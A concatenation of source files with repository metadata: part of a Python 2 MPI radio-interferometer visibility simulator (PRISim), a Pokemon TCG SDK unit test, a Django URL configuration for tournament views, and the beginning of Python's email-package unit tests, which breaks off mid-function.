spindex = -0.83 + spindex_rms * NP.random.randn(fint.size)
else:
NP.random.seed(spindex_seed)
spindex = -0.83 + spindex_rms * NP.random.randn(fint.size)
# ctlgobj = SM.Catalog(freq_catalog*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fint, spectral_index=spindex, src_shape=NP.hstack((fmajax.reshape(-1,1),fminax.reshape(-1,1),fpa.reshape(-1,1))), src_shape_units=['arcsec','arcsec','degree'])
fg_str = 'sumss'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = 1.0e-3 + NP.zeros(ra_deg.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), 'func', spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_MSS:
pass
elif use_GLEAM:
catalog_file = args['GLEAM_file']
catdata = ascii.read(catalog_file, data_start=1, delimiter=',')
dec_deg = catdata['DEJ2000']
ra_deg = catdata['RAJ2000']
fpeak = catdata['S150_fit']
ferr = catdata['e_S150_fit']
spindex = catdata['Sp+Index']
# ctlgobj = SM.Catalog(freq_catalog*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fpeak, spectral_index=spindex)
fg_str = 'gleam'
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), 'func', spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
elif use_PS:
fg_str = 'point'
catalog_file = args['PS_file']
catdata = ascii.read(catalog_file, comment='#', header_start=0, data_start=1)
ra_deg = catdata['RA'].data
dec_deg = catdata['DEC'].data
fint = catdata['F_INT'].data
spindex = catdata['SPINDEX'].data
majax = catdata['MAJAX'].data
minax = catdata['MINAX'].data
pa = catdata['PA'].data
freq_PS = 0.185 # in GHz
freq_catalog = freq_PS * 1e9 + NP.zeros(fint.size)
catlabel = NP.repeat('PS', fint.size)
# ctlgobj = SM.Catalog(catlabel, freq_catalog, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fint, spectral_index=spindex, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fint.size).reshape(-1,1))), src_shape_units=['arcmin','arcmin','degree'])
spec_parms = {}
# spec_parms['name'] = NP.repeat('tanh', ra_deg.size)
spec_parms['name'] = NP.repeat('power-law', ra_deg.size)
spec_parms['power-law-index'] = spindex
# spec_parms['freq-ref'] = freq/1e9 + NP.zeros(ra_deg.size)
spec_parms['freq-ref'] = freq_catalog + NP.zeros(ra_deg.size)
spec_parms['flux-scale'] = fluxes
spec_parms['flux-offset'] = NP.zeros(ra_deg.size)
spec_parms['freq-width'] = NP.zeros(ra_deg.size)
flux_unit = 'Jy'
skymod = SM.SkyModel(catlabel, chans*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), 'func', spec_parms=spec_parms, src_shape=NP.hstack((majax.reshape(-1,1),minax.reshape(-1,1),NP.zeros(fluxes.size).reshape(-1,1))), src_shape_units=['degree','degree','degree'])
# elif use_PS:
# n_src = 1
# fpeak = 1000.0*NP.ones(n_src)
# spindex = NP.ones(n_src) * spindex
# ra_deg = NP.asarray(pointings_radec[0,0])
# dec_deg = NP.asarray(pointings_radec[0,1])
# fmajax = NP.ones(n_src)
# fminax = fmajax
# fpa = NP.zeros(n_src)
# ctlgobj = SM.Catalog('PS', freq_catalog*1e9, NP.hstack((ra_deg.reshape(-1,1), dec_deg.reshape(-1,1))), fpeak, spectral_index=spindex, src_shape=NP.hstack((fmajax.reshape(-1,1),fminax.reshape(-1,1),fpa.reshape(-1,1))), src_shape_units=['arcmin','arcmin','degree'])
# fg_str = 'point'
# skymod = SM.SkyModel(ctlgobj)
## Set up the observing run
if mpi_on_src: # MPI based on source multiplexing
for i in range(len(bl_chunk)):
print 'Working on baseline chunk # {0:0d} ...'.format(bl_chunk[i])
ia = RI.InterferometerArray(labels[baseline_bin_indices[bl_chunk[i]]:min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size,total_baselines)], bl[baseline_bin_indices[bl_chunk[i]]:min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size,total_baselines),:], chans, telescope=telescope, latitude=latitude, A_eff=A_eff, freq_scale='GHz', pointing_coords='hadec')
progress = PGB.ProgressBar(widgets=[PGB.Percentage(), PGB.Bar(), PGB.ETA()], maxval=n_snaps).start()
for j in range(n_snaps):
src_altaz_current = GEOM.hadec2altaz(NP.hstack((NP.asarray(lst[j]-skymod.location[:,0]).reshape(-1,1), skymod.location[:,1].reshape(-1,1))), latitude, units='degrees')
roi_ind = NP.where(src_altaz_current[:,0] >= 0.0)[0]
n_src_per_rank = NP.zeros(nproc, dtype=int) + roi_ind.size/nproc
if roi_ind.size % nproc > 0:
n_src_per_rank[:roi_ind.size % nproc] += 1
cumm_src_count = NP.concatenate(([0], NP.cumsum(n_src_per_rank)))
# timestamp = str(DT.datetime.now())
timestamp = lst[j]
pbinfo = None
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
pbinfo = {}
pbinfo['delays'] = delays[j,:]
if (telescope_id == 'mwa') or (phased_array):
# pbinfo['element_locs'] = element_locs
pbinfo['delayerr'] = delayerr
pbinfo['gainerr'] = gainerr
pbinfo['nrand'] = nrand
ts = time.time()
if j == 0:
ts0 = ts
ia.observe(timestamp, Tsys*noise_bpcorr, bpass, pointings_hadec[j,:], skymod.subset(roi_ind[cumm_src_count[rank]:cumm_src_count[rank+1]].tolist()), t_snap[j], pb_info=pbinfo, brightness_units=flux_unit, roi_radius=None, roi_center=None, lst=lst[j], memsave=True)
te = time.time()
# print '{0:.1f} seconds for snapshot # {1:0d}'.format(te-ts, j)
progress.update(j+1)
progress.finish()
# svf = NP.zeros_like(ia.skyvis_freq.astype(NP.complex128), dtype='complex128')
if rank == 0:
for k in range(1,nproc):
print 'receiving from process {0}'.format(k)
ia.skyvis_freq = ia.skyvis_freq + comm.recv(source=k)
# comm.Recv([svf, svf.size, MPI.DOUBLE_COMPLEX], source=i)
# ia.skyvis_freq = ia.skyvis_freq + svf
te0 = time.time()
print 'Time on process 0 was {0:.1f} seconds'.format(te0-ts0)
ia.t_obs = t_obs
ia.generate_noise()
ia.add_noise()
ia.delay_transform(oversampling_factor-1.0, freq_wts=window)
outfile = '/data3/t_nithyanandan/'+project_dir+'/'+telescope_str+'multi_baseline_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+duration_str+'_baseline_range_{0:.1f}-{1:.1f}_'.format(bl_length[baseline_bin_indices[bl_chunk[i]]],bl_length[min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size-1,total_baselines-1)])+fg_str+'_{0:0d}_'.format(nside)+delaygain_err_str+'Tsys_{0:.1f}K_{1}_{2:.1f}_MHz_'.format(Tsys, bandpass_str, freq/1e6)+pfb_str+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'_part_{0:0d}'.format(i)
ia.save(outfile, verbose=True, tabtype='BinTableHDU', overwrite=True)
else:
comm.send(ia.skyvis_freq, dest=0)
# comm.Send([ia.skyvis_freq, ia.skyvis_freq.size, MPI.DOUBLE_COMPLEX])
else: # MPI based on baseline multiplexing
if mpi_async: # does not impose equal volume per process
print 'Processing next baseline chunk asynchronously...'
processed_chunks = []
process_sequence = []
counter = my_MPI.Counter(comm)
count = -1
ptb = time.time()
ptb_str = str(DT.datetime.now())
while (count+1 < len(bl_chunk)):
count = counter.next()
if count < len(bl_chunk):
processed_chunks.append(count)
process_sequence.append(rank)
print 'Process {0:0d} working on baseline chunk # {1:0d} ...'.format(rank, count)
outfile = '/data3/t_nithyanandan/'+project_dir+'/'+telescope_str+'multi_baseline_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+duration_str+'_baseline_range_{0:.1f}-{1:.1f}_'.format(bl_length[baseline_bin_indices[count]],bl_length[min(baseline_bin_indices[count]+baseline_chunk_size-1,total_baselines-1)])+fg_str+'_{0:0d}_'.format(nside)+delaygain_err_str+'Tsys_{0:.1f}K_{1}_{2:.1f}_MHz_'.format(Tsys, bandpass_str, freq/1e6)+pfb_str+bpass_shape+'{0:.1f}'.format(oversampling_factor)+'_part_{0:0d}'.format(count)
ia = RI.InterferometerArray(labels[baseline_bin_indices[count]:min(baseline_bin_indices[count]+baseline_chunk_size,total_baselines)], bl[baseline_bin_indices[count]:min(baseline_bin_indices[count]+baseline_chunk_size,total_baselines),:], chans, telescope=telescope, latitude=latitude, A_eff=A_eff, freq_scale='GHz', pointing_coords='hadec')
progress = PGB.ProgressBar(widgets=[PGB.Percentage(), PGB.Bar(), PGB.ETA()], maxval=n_snaps).start()
for j in range(n_snaps):
if obs_mode in ['custom', 'dns', 'lstbin']:
timestamp = obs_id[j]
else:
timestamp = lst[j]
pbinfo = None
if (telescope_id == 'mwa') or (telescope_id == 'mwa_tools') or (phased_array):
pbinfo = {}
pbinfo['delays'] = delays[j,:]
if (telescope_id == 'mwa') or (phased_array):
# pbinfo['element_locs'] = element_locs
pbinfo['delayerr'] = delayerr
pbinfo['gainerr'] = gainerr
pbinfo['nrand'] = nrand
ts = time.time()
if j == 0:
ts0 = ts
ia.observe(timestamp, Tsys*noise_bpcorr, bpass, pointings_hadec[j,:], skymod, t_snap[j], pb_info=pbinfo, brightness_units=flux_unit, roi_radius=None, roi_center=None, lst=lst[j], memsave=True)
te = time.time()
# print '{0:.1f} seconds for snapshot # {1:0d}'.format(te-ts, j)
progress.update(j+1)
progress.finish()
te0 = time.time()
print 'Process {0:0d} took {1:.1f} minutes to complete baseline chunk # {2:0d}'.format(rank, (te0-ts0)/60, count)
ia.t_obs = t_obs
ia.generate_noise()
ia.add_noise()
ia.delay_transform(oversampling_factor-1.0, freq_wts=window)
ia.save(outfile, verbose=True, tabtype='BinTableHDU', overwrite=True)
counter.free()
pte = time.time()
pte_str = str(DT.datetime.now())
pt = pte - ptb
processed_chunks = comm.allreduce(processed_chunks)
process_sequence = comm.allreduce(process_sequence)
else: # impose equal volume per process
n_bl_chunk_per_rank = NP.zeros(nproc, dtype=int) + len(bl_chunk)/nproc
if len(bl_chunk) % nproc > 0:
n_bl_chunk_per_rank[:len(bl_chunk)%nproc] += 1
cumm_bl_chunks = NP.concatenate(([0], NP.cumsum(n_bl_chunk_per_rank)))
ptb_str = str(DT.datetime.now())
for k in range(n_sky_sectors):
if n_sky_sectors == 1:
sky_sector_str = '_all_sky_'
else:
sky_sector_str = '_sky_sector_{0:0d}_'.format(k)
if rank == 0: # Compute ROI parameters for only one process and broadcast to all
roi = RI.ROI_parameters()
progress = PGB.ProgressBar(widgets=[PGB.Percentage(), PGB.Bar(), PGB.ETA()], maxval=n_snaps).start()
for j in range(n_snaps):
src_altaz_current = GEOM.hadec2altaz(NP.hstack((NP.asarray(lst[j]-skymod.location[:,0]).reshape(-1,1), skymod.location[:,1].reshape(-1,1))), latitude, units='degrees')
hemisphere_current = src_altaz_current[:,0] >= 0.0
# hemisphere_src_altaz_current = src_altaz_current[hemisphere_current,:]
src_az_current = NP.copy(src_altaz_current[:,1])
src_az_current[src_az_current > 360.0 - 0.5*180.0/n_sky_sectors] -= 360.0
roi_ind = NP.logical_or(NP.logical_and(src_az_current >= -0.5*180.0/n_sky_sectors + k*180.0/n_sky_sectors, src_az_current < -0.5*180.0/n_sky_sectors + (k+1)*180.0/n_sky_sectors), NP.logical_and(src_az_current >= 180.0 - 0.5*180.0/n_sky_sectors + k*180.0/n_sky_sectors, src_az_current < 180.0 - 0.5*180.0/n_sky_sectors + (k+1)*180.0/n_sky_sectors))
roi_subset = NP.where(NP.logical_and(hemisphere_current, roi_ind))[0].tolist()
src_dircos_current_subset = GEOM.altaz2dircos(src_altaz_current[roi_subset,:], units='degrees')
fgmod = skymod.subset(roi_subset)
pbinfo = {}
if (telescope_id == 'mwa') or (phased_array) or (telescope_id == 'mwa_tools'):
if pointing_file is not None:
pbinfo['delays'] = delays[j,:]
else:
pbinfo['pointing_center'] = pointings_altaz[j,:]
pbinfo['pointing_coords'] = 'altaz'
if (telescope_id == 'mwa') or (phased_array):
# pbinfo['element_locs'] = element_locs
pbinfo['delayerr'] = delayerr
pbinfo['gainerr'] = gainerr
pbinfo['nrand'] = nrand
else:
pbinfo['pointing_center'] = pointings_altaz[j,:]
pbinfo['pointing_coords'] = 'altaz'
roiinfo = {}
roiinfo['ind'] = NP.asarray(roi_subset)
roiinfo['pbeam'] = None
roiinfo['radius'] = 90.0
roiinfo_center_hadec = GEOM.altaz2hadec(NP.asarray([90.0, 270.0]).reshape(1,-1), latitude, units='degrees').ravel()
roiinfo_center_radec = [lst[j]-roiinfo_center_hadec[0], roiinfo_center_hadec[1]]
roiinfo['center'] = NP.asarray(roiinfo_center_radec).reshape(1,-1)
roiinfo['center_coords'] = 'radec'
roi.append_settings(skymod, chans, pinfo=pbinfo, latitude=latitude, lst=lst[j], roi_info=roiinfo, telescope=telescope, freq_scale='GHz')
progress.update(j+1)
progress.finish()
roifile = '/data3/t_nithyanandan/'+project_dir+'/roi_info_'+telescope_str+ground_plane_str+snapshot_type_str+obs_mode+duration_str+'_'+fg_str+sky_sector_str+'nside_{0:0d}_'.format(nside)+delaygain_err_str+'Tsys_{0:.1f}K_{1}_{2:.1f}_MHz'.format(Tsys, bandpass_str, freq/1e6)
roi.save(roifile, tabtype='BinTableHDU', overwrite=True, verbose=True)
else:
roi = None
pbinfo = None
roifile = None
roifile = comm.bcast(roifile, root=0) # Broadcast saved RoI filename
pbinfo = comm.bcast(pbinfo, root=0) # Broadcast PB synthesis info
if (rank != 0):
roi = RI.ROI_parameters(init_file=roifile+'.fits') # Other processes read in the RoI information
else:
if plots:
for j in xrange(n_snaps):
src_ra = roi.skymodel.location[roi.info['ind'][j],0]
src_dec = roi.skymodel.location[roi.info['ind'][j],1]
src_ra[src_ra > 180.0] = src_ra[src_ra > 180.0] - 360.0
fig, axs = PLT.subplots(2, sharex=True, sharey=True, figsize=(6,6))
modelsky = axs[0].scatter(src_ra, src_dec, c=roi.skymodel.flux_density[roi.info['ind'][j]], norm=PLTC.LogNorm(vmin=roi.skymodel.flux_density.min(), vmax=roi.skymodel.flux_density.max()), edgecolor='none', s=20)
axs[0].set_xlim(180.0, -180.0)
axs[0].set_ylim(-90.0, 90.0)
pbsky = axs[1].scatter(src_ra, src_dec, c=roi.info['pbeam'][j][:,NP.argmax(NP.abs(chans-freq))], norm=PLTC.LogNorm(vmin=roi.info['pbeam'][j].min(), vmax=1.0), edgecolor='none', s=20)
axs[1].set_xlim(180.0, -180.0)
axs[1].set_ylim(-90.0, 90.0)
cbax0 = fig.add_axes([0.88, 0.5, 0.02, 0.35])
cbar0 = fig.colorbar(modelsky, cax=cbax0, orientation='vertical')
cbax0.set_ylabel('Flux Density [Jy]', labelpad=0, fontsize=14)
cbax1 = fig.add_axes([0.88, 0.1, 0.02, 0.35])
cbar1 = fig.colorbar(pbsky, cax=cbax1, orientation='vertical')
fig.subplots_adjust(hspace=0)
big_ax = fig.add_subplot(111)
big_ax.set_axis_bgcolor('none')
big_ax.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
big_ax.set_xticks([])
big_ax.set_yticks([])
big_ax.set_ylabel(r'$\delta$ [degrees]', fontsize=16, weight='medium', labelpad=30)
big_ax.set_xlabel(r'$\alpha$ [degrees]', fontsize=16, weight='medium', labelpad=20)
fig.subplots_adjust(right=0.88)
for i in range(cumm_bl_chunks[rank], cumm_bl_chunks[rank+1]):
print 'Process {0:0d} working on baseline chunk # {1:0d} ...'.format(rank, bl_chunk[i])
outfile = '/data3/t_nithyanandan/'+project_dir+'/'+telescope_str+'multi_baseline_visibilities_'+ground_plane_str+snapshot_type_str+obs_mode+duration_str+'_baseline_range_{0:.1f}-{1:.1f}_'.format(bl_length[baseline_bin_indices[bl_chunk[i]]],bl_length[min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size-1,total_baselines-1)])+fg_str+sky_sector_str+'sprms_{0:.1f}_'.format(spindex_rms)+spindex_seed_str+'nside_{0:0d}_'.format(nside)+delaygain_err_str+'Tsys_{0:.1f}K_{1}_{2:.1f}_MHz_'.format(Tsys, bandpass_str, freq/1e6)+pfb_str+'{0:.1f}'.format(oversampling_factor)+'_part_{0:0d}'.format(i)
ia = RI.InterferometerArray(labels[baseline_bin_indices[bl_chunk[i]]:min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size,total_baselines)], bl[baseline_bin_indices[bl_chunk[i]]:min(baseline_bin_indices[bl_chunk[i]]+baseline_chunk_size,total_baselines),:], chans, telescope=telescope, latitude=latitude, A_eff=A_eff, freq_scale='GHz', pointing_coords='hadec')
progress = PGB.ProgressBar(widgets=[PGB.Percentage(), PGB.Bar(), PGB.ETA()], maxval=n_snaps).start()
for j in range(n_snaps):
if obs_mode in ['custom', 'dns', 'lstbin']:
timestamp = obs_id[j]
else:
timestamp = lst[j]
ts = time.time()
if j == 0:
ts0 = ts
# ia.observe(timestamp, Tsys*noise_bpcorr, bpass, pointings_hadec[j,:], fgmod, t_snap[j], pb_info=pbinfo, brightness_units=flux_unit, roi_radius=None, roi_center=None, lst=lst[j], memsave=True)
ia.observe(timestamp, Tsys*noise_bpcorr, bpass, pointings_hadec[j,:], skymod, t_snap[j], pb_info=pbinfo, brightness_units=flux_unit, roi_info={'ind': roi.info['ind'][j], 'pbeam': roi.info['pbeam'][j]}, roi_radius=None, roi_center=None, lst=lst[j], memsave=True)
te = time.time()
# print '{0:.1f} seconds for snapshot # {1:0d}'.format(te-ts, j)
progress.update(j+1)
progress.finish()
te0 = time.time()
print 'Process {0:0d} took {1:.1f} minutes to complete baseline chunk # {2:0d}'.format(rank, (te0-ts0)/60, bl_chunk[i])
ia.t_obs = t_obs
ia.generate_noise()
ia.add_noise()
ia.delay_transform(oversampling_factor-1.0, freq_wts=window)
ia.project_baselines()
ia.save(outfile, verbose=True, tabtype='BinTableHDU', overwrite=True)
pte_str = str(DT.datetime.now())
print 'Process {0} has completed.'.format(rank)
PDB.set_trace()
| {
"content_hash": "99af563373fad07557725c85dd107a68",
"timestamp": "",
"source": "github",
"line_count": 1580,
"max_line_length": 611,
"avg_line_length": 55.22594936708861,
"alnum_prop": 0.6399257366171195,
"repo_name": "dannyjacobs/PRISim",
"id": "e6098b94d9a1755184db48b91b01351f7b66164b",
"size": "87257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "main/interferometer_array_data_simulation.mpi.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "2369649"
}
],
"symlink_target": ""
} |
import vcr
import unittest
from pokemontcgsdk import Subtype
class TestSubtype(unittest.TestCase):
def test_all_returns_subtypes(self):
with vcr.use_cassette('fixtures/subtypes.yaml'):
subtypes = Subtype.all()
self.assertTrue(len(subtypes) > 15)
self.assertTrue('MEGA' in subtypes) | {
"content_hash": "8c90a2d46ea3d5c7e6ece9764f7f557a",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 56,
"avg_line_length": 31.181818181818183,
"alnum_prop": 0.6559766763848397,
"repo_name": "PokemonTCG/pokemon-tcg-sdk-python",
"id": "11d57409b1a9354fe614c466ce3459289711dc92",
"size": "343",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_subtype.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "998"
},
{
"name": "Python",
"bytes": "19406"
}
],
"symlink_target": ""
} |
from django.conf import settings
from django.conf.urls import patterns, include, url
urlpatterns = patterns("",
url(r'^campeonato/agregar$','campeonatos.views.agregar', name='agregar_torneo'),
url(r'^campeonato/editar/$','campeonatos.views.editar', name='editar_torneo'),
url(r'^campeonato/editar/(?P<id>\d+)/$','campeonatos.views.editar', name='editar_torneo'),
url(r'^campeonato/encurso/$','campeonatos.views.encurso', name='encurso_torneo'),
url(r'^campeonato/finalizados/$','campeonatos.views.finalizados', name='finalizados_torneo'),
url(r'^campeonato/ver/(?P<id>\d+)/$','campeonatos.views.ver', name='ver_torneo'),
) | {
"content_hash": "056b701ebfc66a797d5df6ad50d918de",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 97,
"avg_line_length": 58.81818181818182,
"alnum_prop": 0.7063369397217929,
"repo_name": "diegonalvarez/tournament-stats",
"id": "47859fca27ce68fd7d810e67a99f4ad8e2357d10",
"size": "647",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "campeonatos/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "31952"
},
{
"name": "JavaScript",
"bytes": "1228"
},
{
"name": "Python",
"bytes": "103117"
}
],
"symlink_target": ""
} |
import os
import sys
import time
import base64
import difflib
import unittest
import warnings
from cStringIO import StringIO
import email
from email.charset import Charset
from email.header import Header, decode_header, make_header
from email.parser import Parser, HeaderParser
from email.generator import Generator, DecodedGenerator
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.audio import MIMEAudio
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
from email.mime.message import MIMEMessage
from email.mime.multipart import MIMEMultipart
from email import utils
from email import errors
from email import encoders
from email import iterators
from email import base64mime
from email import quoprimime
from test.test_support import findfile, run_unittest
from email.test import __file__ as landmark
NL = '\n'
EMPTYSTRING = ''
SPACE = ' '
def openfile(filename, mode='r'):
path = os.path.join(os.path.dirname(landmark), 'data', filename)
return open(path, mode)
# Base test class
class TestEmailBase(unittest.TestCase):
def ndiffAssertEqual(self, first, second):
"""Like assertEqual except use ndiff for readable output."""
if first != second:
sfirst = str(first)
ssecond = str(second)
diff = difflib.ndiff(sfirst.splitlines(), ssecond.splitlines())
fp = StringIO()
print >> fp, NL, NL.join(diff)
raise self.failureException, fp.getvalue()
def _msgobj(self, filename):
fp = openfile(findfile(filename))
try:
msg = email.message_from_file(fp)
finally:
fp.close()
return msg
# Test various aspects of the Message class's API
class TestMessageAPI(TestEmailBase):
def test_get_all(self):
eq = self.assertEqual
msg = self._msgobj('msg_20.txt')
eq(msg.get_all('cc'), ['[email protected]', '[email protected]', '[email protected]'])
eq(msg.get_all('xx', 'n/a'), 'n/a')
def test_getset_charset(self):
eq = self.assertEqual
msg = Message()
eq(msg.get_charset(), None)
charset = Charset('iso-8859-1')
msg.set_charset(charset)
eq(msg['mime-version'], '1.0')
eq(msg.get_content_type(), 'text/plain')
eq(msg['content-type'], 'text/plain; charset="iso-8859-1"')
eq(msg.get_param('charset'), 'iso-8859-1')
eq(msg['content-transfer-encoding'], 'quoted-printable')
eq(msg.get_charset().input_charset, 'iso-8859-1')
# Remove the charset
msg.set_charset(None)
eq(msg.get_charset(), None)
eq(msg['content-type'], 'text/plain')
# Try adding a charset when there's already MIME headers present
msg = Message()
msg['MIME-Version'] = '2.0'
msg['Content-Type'] = 'text/x-weird'
msg['Content-Transfer-Encoding'] = 'quinted-puntable'
msg.set_charset(charset)
eq(msg['mime-version'], '2.0')
eq(msg['content-type'], 'text/x-weird; charset="iso-8859-1"')
eq(msg['content-transfer-encoding'], 'quinted-puntable')
def test_set_charset_from_string(self):
eq = self.assertEqual
msg = Message()
msg.set_charset('us-ascii')
eq(msg.get_charset().input_charset, 'us-ascii')
eq(msg['content-type'], 'text/plain; charset="us-ascii"')
def test_set_payload_with_charset(self):
msg = Message()
charset = Charset('iso-8859-1')
msg.set_payload('This is a string payload', charset)
self.assertEqual(msg.get_charset().input_charset, 'iso-8859-1')
def test_get_charsets(self):
eq = self.assertEqual
msg = self._msgobj('msg_08.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', 'iso-8859-2', 'koi8-r'])
msg = self._msgobj('msg_09.txt')
charsets = msg.get_charsets('dingbat')
eq(charsets, ['dingbat', 'us-ascii', 'iso-8859-1', 'dingbat',
'koi8-r'])
msg = self._msgobj('msg_12.txt')
charsets = msg.get_charsets()
eq(charsets, [None, 'us-ascii', 'iso-8859-1', None, 'iso-8859-2',
'iso-8859-3', 'us-ascii', 'koi8-r'])
def test_get_filename(self):
eq = self.assertEqual
msg = self._msgobj('msg_04.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
msg = self._msgobj('msg_07.txt')
subpart = msg.get_payload(1)
eq(subpart.get_filename(), 'dingusfish.gif')
def test_get_filename_with_name_parameter(self):
eq = self.assertEqual
msg = self._msgobj('msg_44.txt')
filenames = [p.get_filename() for p in msg.get_payload()]
eq(filenames, ['msg.txt', 'msg.txt'])
def test_get_boundary(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
# No quotes!
eq(msg.get_boundary(), 'BOUNDARY')
def test_set_boundary(self):
eq = self.assertEqual
# This one has no existing boundary parameter, but the Content-Type:
# header appears fifth.
msg = self._msgobj('msg_01.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'text/plain; charset="us-ascii"; boundary="BOUNDARY"')
# This one has a Content-Type: header, with a boundary, stuck in the
# middle of its headers. Make sure the order is preserved; it should
# be fifth.
msg = self._msgobj('msg_04.txt')
msg.set_boundary('BOUNDARY')
header, value = msg.items()[4]
eq(header.lower(), 'content-type')
eq(value, 'multipart/mixed; boundary="BOUNDARY"')
# And this one has no Content-Type: header at all.
msg = self._msgobj('msg_03.txt')
self.assertRaises(errors.HeaderParseError,
msg.set_boundary, 'BOUNDARY')
def test_get_decoded_payload(self):
eq = self.assertEqual
msg = self._msgobj('msg_10.txt')
# The outer message is a multipart
eq(msg.get_payload(decode=True), None)
# Subpart 1 is 7bit encoded
eq(msg.get_payload(0).get_payload(decode=True),
'This is a 7bit encoded message.\n')
# Subpart 2 is quopri
eq(msg.get_payload(1).get_payload(decode=True),
'\xa1This is a Quoted Printable encoded message!\n')
# Subpart 3 is base64
eq(msg.get_payload(2).get_payload(decode=True),
'This is a Base64 encoded message.')
# Subpart 4 is base64 with a trailing newline, which
# used to be stripped (issue 7143).
eq(msg.get_payload(3).get_payload(decode=True),
'This is a Base64 encoded message.\n')
# Subpart 5 has no Content-Transfer-Encoding: header.
eq(msg.get_payload(4).get_payload(decode=True),
'This has no Content-Transfer-Encoding: header.\n')
def test_get_decoded_uu_payload(self):
eq = self.assertEqual
msg = Message()
msg.set_payload('begin 666 -\n+:&5L;&\\@=V]R;&0 \n \nend\n')
for cte in ('x-uuencode', 'uuencode', 'uue', 'x-uue'):
msg['content-transfer-encoding'] = cte
eq(msg.get_payload(decode=True), 'hello world')
# Now try some bogus data
msg.set_payload('foo')
eq(msg.get_payload(decode=True), 'foo')
def test_decoded_generator(self):
eq = self.assertEqual
msg = self._msgobj('msg_07.txt')
fp = openfile('msg_17.txt')
try:
text = fp.read()
finally:
fp.close()
s = StringIO()
g = DecodedGenerator(s)
g.flatten(msg)
eq(s.getvalue(), text)
def test__contains__(self):
msg = Message()
msg['From'] = 'Me'
msg['to'] = 'You'
# Check for case insensitivity
self.assertIn('from', msg)
self.assertIn('From', msg)
self.assertIn('FROM', msg)
self.assertIn('to', msg)
self.assertIn('To', msg)
self.assertIn('TO', msg)
def test_as_string(self):
eq = self.assertEqual
msg = self._msgobj('msg_01.txt')
fp = openfile('msg_01.txt')
try:
# BAW 30-Mar-2009 Evil be here. So, the generator is broken with
# respect to long line breaking. It's also not idempotent when a
# header from a parsed message is continued with tabs rather than
# spaces. Before we fixed bug 1974 it was reversedly broken,
# i.e. headers that were continued with spaces got continued with
# tabs. For Python 2.x there's really no good fix and in Python
# 3.x all this stuff is re-written to be right(er). Chris Withers
# convinced me that using space as the default continuation
# character is less bad for more applications.
text = fp.read().replace('\t', ' ')
finally:
fp.close()
self.ndiffAssertEqual(text, msg.as_string())
fullrepr = str(msg)
lines = fullrepr.split('\n')
self.assertTrue(lines[0].startswith('From '))
eq(text, NL.join(lines[1:]))
def test_bad_param(self):
msg = email.message_from_string("Content-Type: blarg; baz; boo\n")
self.assertEqual(msg.get_param('baz'), '')
def test_missing_filename(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_filename(), None)
def test_bogus_filename(self):
msg = email.message_from_string(
"Content-Disposition: blarg; filename\n")
self.assertEqual(msg.get_filename(), '')
def test_missing_boundary(self):
msg = email.message_from_string("From: foo\n")
self.assertEqual(msg.get_boundary(), None)
def test_get_params(self):
eq = self.assertEqual
msg = email.message_from_string(
'X-Header: foo=one; bar=two; baz=three\n')
eq(msg.get_params(header='x-header'),
